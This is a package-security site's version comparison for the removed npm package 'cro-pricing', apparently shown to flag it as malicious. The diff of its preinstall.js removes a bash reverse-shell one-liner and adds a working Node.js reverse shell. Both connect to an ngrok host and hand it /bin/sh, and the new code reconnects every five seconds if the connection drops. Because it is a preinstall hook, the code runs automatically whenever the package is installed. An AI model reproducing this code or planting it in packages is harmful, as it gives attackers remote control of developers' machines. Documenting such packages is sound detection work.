You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket
Book a DemoSign in

cro-pricing

Package Overview
Dependencies
Maintainers
1
Versions
11
Alerts
File Explorer

Advanced tools

License
Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

cro-pricing - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
1.0.6
 to
1.0.7
+1
-1
package.json
{
"name": "cro-pricing",
"version": "1.0.6",
"version": "1.0.7",
"main": "index.js",

@@ -5,0 +5,0 @@ "scripts": {

+17
-7
preinstall.js

@@ -1,10 +0,20 @@

const { exec } = require("child_process");
const net = require("net");
const { spawn } = require("child_process");
const reverseShellCmd = `nohup bash -c 'exec 5<>/dev/tcp/0.tcp.ap.ngrok.io/10113; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`;
const host = "0.tcp.ap.ngrok.io";
const port = 10113;
exec(reverseShellCmd, (error, stdout, stderr) => {
if (error) {
// Optional: log error to your ngrok endpoint or skip silently
return;
}
const client = new net.Socket();
client.connect(port, host, () => {
const sh = spawn("/bin/sh", []);
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
client.on("error", (err) => {
setTimeout(() => {
client.connect(port, host);
}, 5000); // retry on disconnect
});